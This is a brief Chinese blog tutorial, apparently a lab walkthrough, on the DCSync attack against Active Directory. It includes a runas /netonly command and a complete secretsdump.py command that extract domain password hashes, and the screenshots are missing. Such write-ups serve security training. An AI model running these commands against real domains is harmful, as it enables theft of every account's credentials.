DCSync

DCSync是一种通过使用内置的目录复制服务远程窃取Active Directory密码数据库的技术,域控制器使用该协议复制域数据。攻击者模拟域控制器来检索用户NTLM密码哈希。
执行此攻击,必须控制有权执行域复制的帐户(设置了“复制目录更改”和“复制目录所有更改”权限的用户)。默认情况下,默认域管理员具有此权限。
在这里插入图片描述
使用 Get-DomainUser 查看 adunn 的组成员身份
在这里插入图片描述
使用 Get-ObjectAcl 检查 adunn 的复制权限
在这里插入图片描述
runas /netonly /user:INLANEFREIGHT\adunn powershell
获得域复制权限用户shell
使用 Mimikatz 执行攻击
在这里插入图片描述
也可使用 secretsdump.py 提取 NTLM 哈希和 Kerberos 密钥
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值